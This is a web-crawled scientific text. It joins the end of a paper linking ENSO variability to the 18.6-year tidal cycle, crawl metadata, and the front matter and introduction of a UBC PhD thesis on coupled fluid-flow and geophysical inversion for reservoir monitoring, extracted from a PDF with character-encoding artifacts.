SOI occurred in the 1st, 10th and 13th (3rd, 12th and 16th) year after the maximum diurnal tide (Fig. 2D). The horizontal SST and SLP patterns in the 13th tide year (Fig. 3E,F) confirms the El-Niño tendency.\n\nStatistical significance of the present composite analysis was further evaluated as the random processes may generate significant means for relatively short time-series. Monte-Carlo simulations showed that 95%-significant means in 1, 2, 3, 4, 5, and 6 tide years appear at the probabilities of 86, 57, 29, 11, 3.4, and 0.8%, respectively, from 148-year-long random pseudo time-series (Table 1A). The 3, 4, and 5 (4 at 95% significance level and 1 at 90%) significant means corresponding to the SOI, NINO3.4-SST and NINO1 + 2-SST, respectively appear at the probabilities of 29%, 11%, and 8%, respectively, from pseudo random time-series. Hence, it cannot be concluded that the 18.6-yr cycle and ENSO relations in the short (145 yr) time-series are significant at 95% level.\n\nIn contrast, the four 95% and two 90% significant means in the 310-year-long SOI (Fig. 2D) appear only at 0.9% probability from random time-series, leading to the conclusion that ENSO is not completely random and is related to the 18.6-yr cycle at 99% confidence level. Even when the 310-year mean (−0.17) was not subtracted from the time-series, El-Niño (La-Niña) tendency in the 1st, 10th and 13th (3rd) tide year was still found to be significant at 95%, which appeared only at 3.3% probability (Table 1B). The probability of the four 95% significant means being common (occur in the same tide year) between in the short 145-year (Fig. 2A,C) and the long 310-year (Fig. 2D) time-series is 0.14% (Table 1C), further supporting the robustness of the relation between ENSO and the 18.6-yr cycle.\n\n## Discussion\n\nAlthough physical mechanisms which explain the relation between ENSO and 18.6-yr cycle are beyond the focus of the present study and relied on future studies, possible mechanisms are discussed here. A temporal scale difference exists between interannual ENSO and bi-decadal 18.6-yr cycle. 5 × f18.6 frequency (five times 18.6-yr cycle frequency) variability (with the period of 3.7 (=18.6/5) years) which is particularly depicted in the original proxy Stahle-SOI timeseries (blue curve in Fig. 2D has 5 maxima and 5 minima) may be generated through nonlinear dynamical processes and be resonated with equatorial waves5,6,7,8 which are bounded by eastern and western coasts to generate the relation of interannual-scale ENSO and the 18.6-yr cycle. These processes need to be examined in future studies.\n\nThe second discussion is the location and mechanism of the 18.6-yr period forcing. One possible location could be the remote forcing from mid-latitudes, and the other could be the direct forcing in the tropical Pacific. The remote forcing was previously examined with an air-sea coupled climate model22 with locally enhanced vertical mixing and its 18.6-yr period variability around the Kuril Straits which border the North Pacific and the Okhotsk Sea. Anomalous stratification and currents generated around the Kuril Straits propagate along the western boundary as coastally trapped waves to change the equatorial regions. This generates the 18.6-yr period ENSO-like (PDO) variability with its peak in the 6th tide year for La-Niña-like (negative) PDO and 15th year for El-Niño-like (positive) PDO. The relationship between this model-PDO and 18.6-yr cycle is similar to the previous observational one14. The enhanced tide-induced vertical mixing assumed in the climate model around the Kuril Straits was confirmed with direct turbulence observations23,24, and the evidence of 18.6-yr water-mass variability was reported in the subarctic North Pacific and marginal seas25,26,27,28,29. Another climate model experiments30 with globally estimated distribution of tide-induced vertical mixing and its 18.6-yr modulation also confirmed that the ENSO-like PDO variability occurs similarly to the earlier model22 and the observation14, but the model exhibits weaker response in the equatorial and tropical Pacific. This might be because the direct forcing of the 18.6-yr cycle was underestimated in the model.\n\nEvidence of the direct forcing of the 18.6-yr cycle in the equatorial Pacific was demonstrated in the de-trended (warming trend) August-SST in the Indonesian seas during 1910–2015 (Fig. 4). August SST was used because ENSO developed during August before strong air-sea interactions masked the influence of tidal mixing variability. In the Indonesian seas, where semi-diurnal M2 tide is dominant and takes the maxima (minima) in the 9th (0th) tide year, negative (positive) SST caused by the enhanced (weakened) tide-induced mixing could lead to positive (negative) SLP anomaly and thus to El-Niño (La-Niña). The 5-year running mean SST (red curve in Fig. 4) followed the 18.6-yr cycle with the 1/4 phase (about 5 years) lag, except for the low-SST in the early 1990s which corresponded to the 1991-Pinatubo eruption after which El-Niño tended to occur31. This lag of several years is consistent with the La-Niña (El-Niño) -like PDO tendency in the 3rd–5th (10–13th) tide year. The reasons of this lag need to be examined in future studies." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8933617,"math_prob":0.89085555,"size":24342,"snap":"2022-40-2023-06","text_gpt3_token_len":6715,"char_repetition_ratio":0.13374147,"word_repetition_ratio":0.03,"special_character_ratio":0.28111905,"punctuation_ratio":0.1641881,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96041,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-28T21:06:27Z\",\"WARC-Record-ID\":\"<urn:uuid:a538fb61-ff55-4ead-af93-8fd55ee0776f>\",\"Content-Length\":\"286553\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b4efdae-d5aa-4381-8ece-f1aa72b9af41>\",\"WARC-Concurrent-To\":\"<urn:uuid:2a25dad7-122f-4421-8cce-d313d6a57a44>\",\"WARC-IP-Address\":\"146.75.36.95\",\"WARC-Target-URI\":\"https://www.nature.com/articles/s41598-018-33526-4?error=cookies_not_supported&code=40232b38-05fc-4d0a-ab6f-b0a1e6784e92\",\"WARC-Payload-Digest\":\"sha1:X7JMBXQ4ZMU66C5EBFEQ3DLDWKL5DFZI\",\"WARC-Block-Digest\":\"sha1:YTXH53ZUBPH65ID64RBADIXHDDIRKOHY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499654.54_warc_CC-MAIN-20230128184907-20230128214907-00871.warc.gz\"}"}
https://open.library.ubc.ca/cIRcle/collections/ubctheses/24/items/1.0300491
[ "# Open Collections\n\n## UBC Theses and Dissertations", null, "## UBC Theses and Dissertations\n\n### Adaptive optimal experimental design and inversion of a coupled fluid flow and geophysical imaging model… Fohring, Jennifer 2016\n\nMedia\n24-ubc_2016_september_fohring_jennifer.pdf [ 4.28MB ]\nJSON: 24-1.0300491.json\nJSON-LD: 24-1.0300491-ld.json\nRDF/XML (Pretty): 24-1.0300491-rdf.xml\nRDF/JSON: 24-1.0300491-rdf.json\nTurtle: 24-1.0300491-turtle.txt\nN-Triples: 24-1.0300491-rdf-ntriples.txt\nOriginal Record: 24-1.0300491-source.json\nFull Text\n24-1.0300491-fulltext.txt\nCitation\n24-1.0300491.ris\n\n#### Full Text\n\n`Adaptive optimal experimental designand inversion of a coupled uid owand geophysical imaging model forreservoir monitoringbyJennifer FohringB.Sc., The University of British Columbia, 2011A THESIS SUBMITTED IN PARTIAL FULFILLMENT OFTHE REQUIREMENTS FOR THE DEGREE OFDOCTOR OF PHILOSOPHYinThe Faculty of Graduate and Postdoctoral Studies(Geophysics)THE UNIVERSITY OF BRITISH COLUMBIA(Vancouver)May 2016c Jennifer Fohring 2016AbstractImaging and prediction of uid ow within the subsurface provides information crucialto decision making processes in \felds such as groundwater management and enhancedoil recovery. The ow of a uid through a reservoir depends primarily on the perme-ability of the subsurface rock; a quantity that is often unknown throughout the entiredomain of the reservoir. One method for predicting ow is to estimate the permeabil-ity of the reservoir and simulate ow through a mathematical subsurface ow model.Given the model, ow data can be inverted to estimate the permeability. However,this inversion approach can lead to inaccurate results due to the sparse sampling ofow data, and thus inaccurate predictions.To acquire a higher sampling of data, geophysical survey techniques are appliedin order to e\u000eciently collect a higher density of data sampled at the surface. Thesedata are sensitive to changes to the geophysical properties of the reservoir due toow. Inversion of geophysical data then provides images of changes to the geophysicalproperties of the reservoir. In order to estimate the ow parameters using geophysicaldata, the two mathematical models require coupling.The thesis therefore proposes two approaches to improve the imaging and predic-tion of ow. First, a novel coupled inverse problem for estimating the uid velocity\feld and the initial geophysical property model from geophysical data is developed.Second, a new method of optimally designing the geophysical survey for the coupledinverse problem is developed. The new adaptive design approach builds on traditionalA-Optimal design methods such that historic data are included in the design algo-iiAbstractrithm. This produces designs that adapt with ow in the subsurface and reduce thecollection of unnecessary data. Both the coupled inverse problem and adaptive sur-vey design method are demonstrated using a seismic tomography geophysical surveyand a tracer advection uid ow model. Numerical examples show that the coupledapproach yields an improved ow estimate as well as improved image quality, whilethe adaptive optimal designs provide su\u000ecient geophysical data.iiiPrefaceThis thesis contains original research conducted while studying at the University ofBritish Columbia, resulting in two publications and one expanded conference pro-ceeding.The idea of the coupled inverse problem presented in Chapter 4 came originallyfrom conversations with Dr. Eldad Haber. The subsequent derivations, code imple-mentation, numerical tests, and manuscript preparation were carried out in collabo-ration with Dr. Lars Ruthotto, a post doctoral researcher with Dr. Eldad Haber atthe time. The work was published in Fohring, J., Haber, E., and Ruthotto, L. (2014).Geophysical imaging of uid ow in porous media. SIAM Journal on Scienti\fc Com-puting, 36(5):218{236), and various parts of were adapted from an SEG conferenceproceeding ( Fohring, J., Ruthotto, L., and Haber, E. (2013). Geophysical Imaging,Reservoir History Matching and Forecasting. In 2013 SEG Annual Meeting, Houston.Society of Exploration Geophysicists).The idea of adaptive experimental design also resulted from conversations with Dr.Eldad Haber. The development of this idea is presented in Chapter 5. The subsequentderivations, code implementation, numerical tests, and manuscript preparation foradaptive optimal design were carried out by myself with contributions, input, andadvice from Dr. Haber. The bulk of the text in Chapter 5 is adapted from thepaper (Fohring, J. and Haber, E. (2016). Adaptive A-optimal experimental design forlinear dynamical systems. SIAM Journal on Uncertainty Quanti\fcation, xx:1{19),which is still at the time of writing, going through the review process.ivTable of ContentsAbstract . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . iiPreface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ivTable of Contents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . vList of Figures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . viiiAcknowledgements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xiiDedication . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xiv1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11.1 Reservoir characterization . . . . . . . . . . . . . . . . . . . . . . . . . 11.2 Geophysics for reservoir characterization . . . . . . . . . . . . . . . . . 41.3 Optimal survey design . . . . . . . . . . . . . . . . . . . . . . . . . . . 101.4 Thesis objective and outline . . . . . . . . . . . . . . . . . . . . . . . . 122 A model reservoir monitoring experiment . . . . . . . . . . . . . . . . 152.1 Geophysics: seismic tomography . . . . . . . . . . . . . . . . . . . . . 172.2 Dynamics: tracer advection . . . . . . . . . . . . . . . . . . . . . . . . 182.3 Physical parameter relations . . . . . . . . . . . . . . . . . . . . . . . . 202.4 Discretization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.4.1 Discretization of the tomography equation . . . . . . . . . . . . 22vTable of Contents2.4.2 Discretization of the mass balance . . . . . . . . . . . . . . . . 232.4.3 Discretization of the ux-balance conservation . . . . . . . . . 242.4.4 A Particle-In-Cell method for ow simulation . . . . . . . . . . 252.5 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 283 Error characterization and model estimation . . . . . . . . . . . . . . 303.1 Linear inversion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303.2 Coupled inversion and error characterization . . . . . . . . . . . . . . . 343.2.1 Exact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . . 343.2.2 Inexact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . 363.3 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 374 Coupled inversion for velocity and initial slowness . . . . . . . . . . 394.1 Flow constrained geophysical imaging . . . . . . . . . . . . . . . . . . 404.2 Discretization of regularization functionals . . . . . . . . . . . . . . . . 424.3 Numerical optimization . . . . . . . . . . . . . . . . . . . . . . . . . . 444.4 Initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494.5 Experimental setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 504.6 Sequential reconstruction as initialization . . . . . . . . . . . . . . . . 504.7 Joint reconstruction . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544.8 Forecasting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 554.9 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 565 Dynamic optimal experimental design . . . . . . . . . . . . . . . . . . 575.1 Adaptive experimental design . . . . . . . . . . . . . . . . . . . . . . . 585.2 Design for dynamical systems . . . . . . . . . . . . . . . . . . . . . . . 645.2.1 Exact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . . 645.2.2 Inexact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . 65viTable of Contents5.3 Numerical optimization . . . . . . . . . . . . . . . . . . . . . . . . . . 665.3.1 Exact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . . 665.3.2 Inexact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . . 695.4 Numerical examples . . . . . . . . . . . . . . . . . . . . . . . . . . . . 705.4.1 Regularization . . . . . . . . . . . . . . . . . . . . . . . . . . . 725.4.2 Monitor function . . . . . . . . . . . . . . . . . . . . . . . . . . 745.5 Design results: exact dynamics . . . . . . . . . . . . . . . . . . . . . . 745.6 Results: inexact dynamics . . . . . . . . . . . . . . . . . . . . . . . . . 785.7 Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 786 Conclusions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 83Bibliography . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89viiList of Figures1.1 Model of a reservoir with minimal wells. Estimation of the permeability(k(~x)) using only pressure (p) and hydraulic head (z) data of a uidmoving with velocity (~u), collected from sparsely distributed wells willgenerate highly inaccurate results. . . . . . . . . . . . . . . . . . . . . 31.2 Model of a reservoir with geophysical survey measurement locations de-picted in orange. Changes to the geophysical model parameters (m(~x))can be estimated through inversion of the densely sampled geophysicaldata (di). . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52.1 Tomography setting: sources (si) and receivers (rj) are placed in t-wo boreholes and the travel times of an acoustic wave traveling alongadjoining ray paths (i;j) are measured. . . . . . . . . . . . . . . . . . 172.2 Tracer advection: Tracer of concentration (c) is advected in a uidof density (\u001a) with velocity \feld (~u). The hydraulic conductivity (K)determines the velocity \feld given a pressure gradient within the reser-voir. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202.3 A grid cell with length h1and height h2, slowness value (mj) locatedat the cell center, and components of the uid velocity owing in (~u =[u+1; u+2]) and out (~u = [u1; u2]) on the cell edges. . . . . . . . . . . . 24viiiList of Figures2.4 Particle-In-Cell method for the advection and mass-conservation equa-tion. A particle located in the cell-centered point~xAon the regularmesh is pushed forward with velocity~u along the path~u\u0001t, to thenon-grid point~xB. The value (mass) associated with the particle isthen transferred to the cell centered grid points adjacent to~xBusinginterpolation weights. . . . . . . . . . . . . . . . . . . . . . . . . . . . 274.1 Visualizations of the ground true and reference hydraulic conductivitymodels and associated ow \felds. The true and reference models arediscretized on a 100\u0002200 cell grid on a domain of 100m depth by 200macross. A static source, at 55m depth on the left border, and a sink,at 65m depth on the right border of the domain, are indicated by red.The reference model is a simpli\fed model which interpolates boreholedata between the two wells. . . . . . . . . . . . . . . . . . . . . . . . . 514.2 Visualization of ground truth data for the domain with dimensions100m (y direction) depth and 200m (x direction) across (\frst colum-n), individual reconstruction (second column) and results of the jointreconstruction approach. The \frst row visualizes the initial slowness(m0). The second shows a quiver plot of the recovered velocity \feld(~u). The components of the velocity \feld [ux; uy] are pictured in thethird and fourth row and the last row shows the curl of the velocity\feld (r\u0002~u). Note that there is almost no ow in the y direction, andthat at the boundaries of the reservoir there are non-zero values of thecurl of~u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52ixList of Figures4.3 The evolution of the tracer is pictured for the ground-truth (left col-umn), individual reconstruction used for initialization (middle column),and the proposed joint reconstruction. The tracer evolution is simu-lated for 40 days with the respective initial slowness and ow \feld.The front of the ground truth tracer is visualized by dashed lines forthe \frst 3 rows. Note that the joint method results match the groundtruth tracer front to a greater degree than the predictions from theinitialization estimates. . . . . . . . . . . . . . . . . . . . . . . . . . . 535.1 Initial experiment setup. Tomography sources are pictured in greenon the left and receivers in blue on the right. The initial setup coversthe entire ow domain with 20 sources and 30 receivers. There is onesource of uid, pumped at a constant rate from the top green point,and a sink at the bottom (red) of the domain. Flow is in the downwarddirection. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 715.2 Plot of the relative error (kmtrue1bm1k=(kmtrue1k)) versus the regular-ization parameter \u000b for both the linear regularization and smoothedtotal variation. The TV regularization gives a better estimate of themodel for the case of a sharp target. . . . . . . . . . . . . . . . . . . . 735.3 Exact dynamics: plots of the adapted mean squared error amse vs.the number of nonzero weights (left column), and the weights used toconduct experiments 1, 3, and 5, at times t0; t2; t4. . . . . . . . . . . 755.4 Exact dynamics: relative error plots. Model error is compared for eachexperiment for both the linear and TV regularization . . . . . . . . . . 77xList of Figures5.5 Exact dynamics: optimal designs and recovered models for 9 experi-ments. The top row shows the rays and the recovered model, with thenumber of rays (#d = 297) given below, followed by the true modelsin the second row, the models recovered using total variation in thethird row, and \fnally the models recovered using the linear gradientregularization. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 795.6 Inexact dynamics: relative error plots. Model error is compared foreach experiment for both the linear and TV regularization . . . . . . . 805.7 Inexact dynamics: optimal designs and recovered models for 9 experi-ments. The top row shows the rays and the recovered model, with thenumber of rays given below. The second row pictures true models, thethird shows the models recovered using total variation, and \fnally thebottom shows models recovered using the linear gradient regularization. 82xiAcknowledgementsThis thesis would never have been possible without the guidance, assistance andsupport of a large group individuals.First and foremost, I would like to express my deepest gratitude to my supervi-sor Eldad Haber for all of the guidance, advice, and arguments he has provided. Ihave learned a great deal working with you over the past 6 years, not only aboutcomputational geophysics, but also about myself. Toda raba.During my PhD I had the privilege of working at IBM with Lior Horesh. ThankLior for your kindness, encouragement, and for providing me with so many di\u000berentexplanations and perspectives on inverse problems and optimization. I am trulygrateful for the time spent with you and your lovely family in New York.And to Lars Ruthotto, the paper wouldn't have happened without you. I learnedso much working with you. Thank you.Many thanks to all of my o\u000ece mates and colleagues; particularly Klara and Luzfor your much appreciated reading and editing of my thesis, and for lending an ear tomany questions, concerns, and complaints! And also to Gudni, Sarah, Justin, Kris,Mike, Mike, Dikun, Rowan, Seogi,and Lindsey, for help, encouragement, editing, andfun!A very special thanks to my dear friends Marianne and JF: for campus lunches,hikes, dogs, skiing, beer, wine, rowing, science, and games.And \fnally, thank you to my best friend and partner Dave Marchant. For every-thing.xiiAcknowledgementsThe funding of this work was generously provided from a variety of sources.Thanks to University of British Columbia, the Department of Earth and Ocean Sci-ences, the Society of Exploration Geophysics, the Natural Sciences and EngineeringResearch Council of Canada, and MITACS for their support.xiiiTo my parents.xivChapter 1IntroductionSubsurface reservoirs are de\fned as regions of uid saturated porous rock and arecommonly depleted through uid extraction. Maintenance of groundwater aquifers(a reservoir of water) or oil producing reservoirs as they are depleted, often requirese\u000ecient methods of monitoring uid ow within the subsurface. The ability to trackand predict the ow is important for both environmental and economical reservoirmanagement. For example, in an oil recovery scenario, where a uid such as water isinjected into a depleted oil reservoir to enhance recovery, it is crucial to know wherethe oil and water are at a given time. Monitoring this process provides informationcrucial to future uid management decisions. For example, decisions such as fromwhich wells to extract, which wells to shut in, and from which wells to inject cana\u000bect production rates, uid loss, and overall e\u000eciency.One particular aspect of reservoir management programs involves predicting orforecasting uid ow within the subsurface. To do so, ow is simulated by building amathematical model of the subsurface, often referred to as reservoir characterization.1.1 Reservoir characterizationIn most cases, reservoirs consist of isolated regions of porous rock surrounded byregions of non-porous rock. See Figure 1.1 below for a diagram. Thus, the dynamicsof a reservoir are commonly governed by mathematical models describing uid owin a porous media, which come in many forms with varying degrees of complexity.11.1. Reservoir characterizationSome of the more common models include: single phase ow, two-phase ow, blackoil models, advection-di\u000busion models, and reactive contaminant transport models.For example, the model describing single phase ow in a porous media as presentedin (Chen et al., 2006), given the spatial and temporal variables~x and t, is as follows@(ffi\u001a)@t= r \u0001 (\u001a~u) + q; (1.1a)~u =k\u0016(rp \u001agrz): (1.1b)Equation 1.1a is derived by tracking mass conservation of a uid with viscosity \u0016owing through a rectangular three dimensional di\u000berential volume, see (Chen et al.,2006) for the complete derivation. The porosity of the rock (the fraction of a rep-resentative elementary volume available for uid) is denoted by ffi, and the densityof the uid by \u001a(t;~x). The velocity of the uid~u(~x) is de\fned as the super\fcialDarcy velocity, and described by Equation 1.1b, the conservation of momentum e-quation also known as Darcy's law. The ow in this model is generated by a pressuregradient, rp(t;~x), resulting from the sources and sinks, q, and from a gravitationalgradient, \u001agrz, where rz is the di\u000berence in uid heights, and g is the magnitude ofthe gravitational acceleration.If there is no compressibility in the rock then@(ffi\u001a)@t! 0, such that no uid is storedwithin the rock pore space. Additionally, the velocity depends on the permeabilitytensor k of the porous rock and the uid viscosity \u0016. The permeability is an averageproperty of the reservoir that measures the ability of a porous media to transmit uid.In most cases, k is a tensor, unless it is assumed that k(~x)11= k(~x)22= k(~x)33= k(~x).In this case the porous media is known as isotropic, where the ow is the same in alldirections. It is otherwise anisotropic.In order to simulate ow using a reservoir model and solve for the pressure p,the permeability k(~x), often referred to as a reservoir parameter function, must be21.1. Reservoir characterizationFigure 1.1: Model of a reservoir with minimal wells. Estimation of the permeability(k(~x)) using only pressure (p) and hydraulic head (z) data of a uid moving withvelocity (~u), collected from sparsely distributed wells will generate highly inaccurateresults.known. However, this function is often unknown and thus must be estimated fromborehole rock samples. In most cases boreholes are expensive to drill, and are thussparsely distributed throughout the reservoir. This leads to inaccurate estimates ofk(~x) for the entire region, as values must be extrapolated between boreholes overlarge distances (Roubinet et al., 2013).One approach to alleviating this problem is to use historic ow data, measurementsof the pressure p and hydraulic head z, to estimate the unknown parameter functionk(~x). This process is alternately known as parameter estimation, inversion, and inthe oil and gas industry is referred to as history matching (Oliver and Chen, 2010;Oliver et al., 2008). The basic idea of history matching is to estimate the reservoirparameters such that simulated ow data \fts measured data.Technically, the inversion process is rather challenging as it involves the discretiza-tion of a system of partial di\u000berential equations, the solution of the forward problem(ow simulation), the computation of the gradients of the simulator with respect tothe parameters, and the solution of an optimization problem. An excellent review of31.2. Geophysics for reservoir characterizationthe process can be found in (Oliver and Chen, 2010).Although it is possible to estimate the reservoir parameters through inversion andpredict ow data, these estimates can be a highly inaccurate representation of thereservoir. This inaccuracy stems from the large null space of the inverse problemassociated with the highly sparse spatial sampling of reservoir ow data.To overcome the null space issue subspace techniques have been applied, wherethe reservoir parameters are restricted to \\live\" in a small subspace spanned by a(relatively) small number of vectors (Abacioglu et al., 2001; Gerritsen and Durlof-sky, 2005; Oliver and Chen, 2010; Sarma et al., 2013). This approach decreases thevariance in the recovered estimates of k(~x) by increasing the bias of the estimatedreservoir parameters (Tenorio, 2001).A di\u000berent approach to reduce the variance of the recovered reservoir parametermodels is to simply add additional ow data and further sample the reservoir. Whilethis is clearly one of the better ways to reduce the uncertainty in the estimates, itis not practical as it is unlikely that many more wells will be drilled just to improvethe simulation capability. However, assuming that the geophysical rock properties ofthe reservoir (density or electrical conductivity for example) will change with uidow, implies that geophysical survey techniques can potentially be used to map thesechanges. This makes geophysics for reservoir characterization a practical method toincrease data collection coverage without having to drill additional wells.1.2 Geophysics for reservoir characterizationGeophysical survey techniques measure variation in the geophysical properties of thesubsurface by systematically collecting geophysical data over a large spatial surfacegrid and within existing boreholes. Geophysical data are not only valuable on theirown for detecting variation in the subsurface, but can also be inverted to obtain an41.2. Geophysics for reservoir characterizationimage of the underlying geophysical property distribution. Thus, geophysical data cancomplement reservoir ow data by providing a denser grid of measurements than fromsubsurface ow data obtained from point locations at well sites alone (Hubbard andRubin, 2000). For example, Figure 1.2 provides an example of a geophysical surveywith data, di, collected at the surface (orange dots). Sensors could additionallybe placed in the existing boreholes to further increase data numbers and depth ofinvestigation.Figure 1.2: Model of a reservoir with geophysical survey measurement locations de-picted in orange. Changes to the geophysical model parameters (m(~x)) can be esti-mated through inversion of the densely sampled geophysical data (di).The spatial resolution and depth of investigation of geophysical data depends pre-dominantly on the choice of technique. Applied geophysical surveys are a widely usedmethod of imaging the subsurface in resource exploration. Therefore, there are manywell developed survey types available for imaging subsurface ow. In particular, timelapse seismic surveys, ground penetrating radar, time lapse gravity measurements,and electromagnetic imaging techniques have been used for oil reservoir and aquifercharacterization for some time (Alumbaugh and Morrison, 1995; Archie, 1942; Hub-bard and Rubin, 2000; Lumley, 2001a; Vasco et al., 2004; Vesnaver et al., 2003).51.2. Geophysics for reservoir characterizationAs an example, gravity methods, which are sensitive to shallow changes to thedensity of the subsurface rock, are a common choice in hydrology applications. Wateraquifers tend to be small and close to the surface and thus gravity methods candetect small variations in density as water is depleted, see for example (Alumbaughand Morrison, 1995; Slater et al., 2000; Wilt et al., 1995). In this case measuredgeophysical data consist of small changes to the local gravitational \feld above theaquifer.Oil reservoirs in comparison, are often large, at, not necessarily close to the sur-face, and commonly discovered using seismic techniques. Thus seismic surveys arefrequently the \frst choice for monitoring programs (Lumley, 2001b). Additionally,electromagnetic methods are attractive for monitoring injected uids because the elec-trical conductivity of the injected uid can be controlled. For example, the injecteduid can be selected such that it's conductivity maximizes the conductivity contrastbetween the existing media and the introduced uid. This then generates a greatersignal in the measured electric and magnetic potential data.Although geophysical surveys are an excellent method for imaging changes in thegeophysical properties of the subsurface, inferring reservoir parameter functions fromgeophysical data or recovered images of the geophysical property models is not sostraightforward. The use of geophysics for inferring reservoir parameters, sometimesknown as geophysical history matching, rests on the assumption that a mathemati-cal relationship (petrophysical relationship) between the geophysical properties andreservoir parameter function(s) exists and is known. Historically, much work has beendone to determine these relationships (Archie, 1942; Mavko et al., 2009). Althoughthese relations tend to be empirical and site speci\fc, they have been successful inprogressing geophysical history matching work-ows.A second point of concern in the geophysical history matching process is that61.2. Geophysics for reservoir characterizationmost often the mathematical geophysical model and the reservoir uid model aredecoupled. Thus, the inversion process is decoupled. This decoupled inversion processhas a major shortcoming; since geophysical imaging is almost always ill-posed, theaccuracy of the imaging is typically low. Estimating the reservoir model parametersfrom the geophysical images alone, or in combination with low resolution modelsobtained from inverting uid ow data, can yield inaccurate and biased estimates.To address this shortcoming, (Hubbard and Rubin, 2000) propose several param-eter estimation approaches using statistical geophysical-hydrological techniques tocharacterize an aquifer with geophysical and hydrological data. One particular tech-nique takes a Bayesian iterative approach where the ow log-permeability (a com-monly measured reservoir parameter) is \frst estimated through inversion of sparsehydrological data. This estimate is considered to be a random variable with a proba-bility distribution, and is then used as a prior distribution for the Bayesian inversionof geophysical data. Geophysical data along with the known parameter relationshipsare then inverted to recover an update to the log permeability while including theprior permeability estimate. Alternately, several geostatistical approaches have beenproposed to match structures within images of di\u000bering parameters to geologic datafrom core samples, or maximize correlations. These approaches su\u000ber the same pa-rameter function requirements and lower resolution biased estimates (Cassiani et al.,1998; Doyen, 1988; Pollock and Cirpka, 2012).In oil reservoir monitoring practice, seismic history matching is the predominan-t method (Abul, 2010; Emerick and Reynolds, 2012; Gosselin et al., 2003; Lumley,2001b; Mezghani et al., 2013; Nenna et al., 2011; Oliver and Chen, 2010; Sarma et al.,2013; Trani, 2012; Vasco et al., 2004). Similar to the geophysical-hydrological tech-niques, seismic history matching involves estimating geophysical properties throughinversion of geophysical data, mapping the estimated geophysical property model toa reservoir parameter model through a physical property relation, and \fnally simu-71.2. Geophysics for reservoir characterizationlating uid ow data and matching it with observed ow data collected. If the datamatch is poor, either the reservoir parameter model is adjusted, or new geophysicalinversions are carried out and the process is repeated. If the simulations using thereservoir model predict the historic ow data then forecasts can be generated withsome certainty. In general, the seismic history matching process su\u000bers as it requiresparameter mappings and the mathematical models are decoupled in the inversions.The concept of coupling the dynamic reservoir model with a geophysical modelin order to gain a better estimate of the unknown reservoir parameters is not new.For example, the Kalman \flter was developed in the early 1960's to incorporate newobservation data into the estimation of the position of a moving object and becamea common method for applications in guidance, navigation and control of vehicles,particularly aircraft and spacecraft.Classical Kalman \fltering is a Bayesian inversion method that iteratively uses atime-series of noisy observed measurements to estimate unknown model parameters.If the noise is assumed to be characterized by a Gaussian distribution then the \flteryields the exact conditional probability following Bayes rule (recursive Bayesian esti-mation), which can also be interpreted as the solution to a linear regularized inverseproblem (Kalman, 1960). In the context of geophysical history matching, Kalman\fltering is derived from an inverse problem that simultaneously minimizes the geo-physical measurement error and the error in the ow model simulation.Kalman \fltering, and ensemble Kalman \fltering (EnKF) (Evensen, 1994), haverecently been proposed as alternative approaches to seismic history matching as theycouple the reservoir model and geophysical model (Abul, 2010; N\u001avdal et al., 2002;Nenna et al., 2011; Vauhkonen et al., 1998). The Kalman \flter (also known as theKalman gain matrix) couples the geophysics, the dynamics, and the prior error co-variance matrices. However, its use for geophysical imaging of ow requires a phys-ical parameter relationship. Additionally, the large dense covariance matrix which81.2. Geophysics for reservoir characterizationcharacterizes the prior distribution must be known, and is propagated in time. Forproblems such as seismic imaging, where the data set and the parameter space arelarge, Kalman \fltering becomes computationally infeasible as a result of the storageand computation with the dense covariance matrices. To alleviate this, stochasticmethods such as the EnKF were developed to approximate the covariance matrices.The EnKF method is a Monte Carlo type sequential Bayesian inversion method\frst proposed by Evensen (1994) to reduce computations and memory. The EnKFmethod introduces ensembles of state (parameter models) and measurement vectors(geophysical data for example) sampled from Gaussian distributions such that theprior state covariance matrix can be approximated by computing the covariance ofthe ensemble set. This reduces the inverse problem to the dimension of the ensem-ble. Abul (2010) found that there is promise in EnKF methods for reservoir historymatching, however, it was limited by uncertainty in the initial condition and errorestimates, and by the computation required for integration of large amounts of da-ta and the non-linearity introduced through the relationship between reservoir andseismic parameters.In a similar avour to Kalman \fltering, there has been some recent researchto couple non-linear geophysical imaging with ow models in the hydrogeophysicscommunity through regularization of the geophysical inverse problem with the 